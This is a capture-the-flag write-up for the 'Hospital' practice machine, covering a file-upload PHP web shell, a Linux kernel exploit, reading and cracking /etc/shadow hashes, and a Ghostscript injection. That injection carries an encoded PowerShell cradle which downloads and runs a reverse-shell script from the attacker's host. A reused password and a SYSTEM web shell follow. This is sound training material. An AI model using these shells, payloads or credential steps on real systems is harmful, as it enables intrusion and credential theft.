User Flag

Nmap scans:

sudo nmap -p- --min-rate=1000 -oN nmap.out hospital.htb

Pasted image 20250603073312.png

sudo nmap -p$ports -sC -sV -vv -oN nmap_scripts.out hospital.htb

Pasted image 20250603073714.png

Navigating to port 8080: Pasted image 20250603075848.png

After registering an account, we have access to a file upload feature:

Pasted image 20250603080001.png

Since this is a PHP web application, let’s try uploading a PHP web shell:

echo '<?php system($_REQUEST["cmd"]); ?>' > ./shell.php

Pasted image 20250603081519.png

We can intercept the request: Pasted image 20250603082105.png

And notice that is redirecting to /failed.php:

Pasted image 20250603082146.png

Trying some common php extensions leads us to a /success.php

Pasted image 20250603085716.png

It doesn’t, however, tell us where the file is being stored, but by doing a dir buster we discover there is a /uploads dir:

feroxbuster --url http://hospital.htb:8080 -o feroxbuster_hospital.out

Pasted image 20250603090140.png

Trying to access, we get a 200 http response, but empty.

Pasted image 20250603201204.png

Probably there are some php functions being disabled. Let’s try finding out more, by creating a phar that calls the phpinfo() function.

Pasted image 20250603201446.png

We upload the file and try to access it the same way.

Pasted image 20250603201638.png

As we expected there are a lot of disabled functions, including the system function that we were using in our webshell. We probably could do something with the functions that are enabled, but let’s just use:

https://github.com/flozz/p0wny-shell

We upload the shell the same way and we get: Pasted image 20250603202224.png

And now we can execute our reverse shell:

Pasted image 20250603202558.png Pasted image 20250603202859.png Now in our nmap scan: Pasted image 20250603202752.png We can see that the ttl is 62 so we are probably in some type of ubuntu virtualization, not in the windows machine that we want to be, so we need to escalate.

Other than the a user: Pasted image 20250603203505.png there really isn’t anything special in the vm. Our only option seems to be to try to exploit an old kernel: Pasted image 20250603203635.png

Doing a google search, we find this exploit:

https://github.com/synacktiv/CVE-2023-35001

Let’s try it:

git clone https://github.com/synacktiv/CVE-2023-35001.git

Pasted image 20250603204256.png

make

Pasted image 20250603204348.png

Now we start a python webserver and upload the two necessary files: exploit and wrapper Pasted image 20250603204559.png

Pasted image 20250603204529.png Pasted image 20250603204625.png

Pasted image 20250603204726.png

Even with root there continues to not be anything particularly interesting, but since we are root we can access the shadow file and get the hashed password for the drwilliams user:

cat /etc/shadow

Pasted image 20250603204914.png

Let’s try to crack it in hashcat:

echo '$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/' > hash.txt

Pasted image 20250603205131.png

hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt.gz

Pasted image 20250603205613.png

We can now access some smb shares: Pasted image 20250603205851.png

We can also find that there is a user drbrow: Pasted image 20250603210619.png

Let’s try to use the information that we have in the other webapp:

Pasted image 20250605082424.png

Pasted image 20250605082455.png We have an email for drbrown which is an user that we already knew existed. Pasted image 20250605083540.png

So drbrown is waiting for an .esp file to visualize it with GhostScript. Looking for Ghostscript exploits we can find:

https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection

This exploit creates an esp file that executes a payload. Let’s try it. First let’s create our payload:

cat web_cradle.ps1| iconv -t utf-16le |base64 -w0

Pasted image 20250605084756.png

Our payload is gonna be:

poweshell -enc SQBFAFgAKABJAFcAUgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIABoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOQA6ADgAMAAwADAALwByAGUAdgBfAHMAaABlAGwAbAAuAHAAcwAxACkACgA=

python CVE_2023_36664_exploit.py --generate --filename needle --extension eps --payload "poweshell -enc SQBFAFgAKABJAFcAUgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIABoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOQA6ADgAMAAwADAALwByAGUAdgBfAHMAaABlAGwAbAAuAHAAcwAxACkACgA="

Pasted image 20250605085344.png

We got a needle.esp file. Let’s send it to drbrown and wait for a hit in our python webserver for the web_cradle:

Pasted image 20250605085750.png

And we receive a rev shell: Pasted image 20250605092625.png Pasted image 20250605092721.png

in the ghostscript.bat we can find the password chr!$br0wn let’s see if we can winrm with the password:

Pasted image 20250605092917.png

Let’s winrm:

evil-winrm -i hospital.htb -u 'drbrown' -p 'chr!$br0wn'

Pasted image 20250605093001.png

And we now can get the user flag:

Pasted image 20250605093035.png

Root flag

In the C:\ we can find a xampp dir:

Pasted image 20250606203153.png

Checking the acls: Pasted image 20250606203521.png

The folder htdocs is configured so that system accounts and administrators have full control. Regular users have read & execute permissions, and some write permissions in subfolders.

So let’s try to create a webshell and see if it executes commands as nt authority: Pasted image 20250606203823.png

Let’s use the previous p0wny shell, and try to access it:

Pasted image 20250606204007.png

Now check who we are:

Pasted image 20250606204032.png

We got it. Now only thing left it is to get the flag:

Pasted image 20250606204326.png Pasted image 20250606204401.png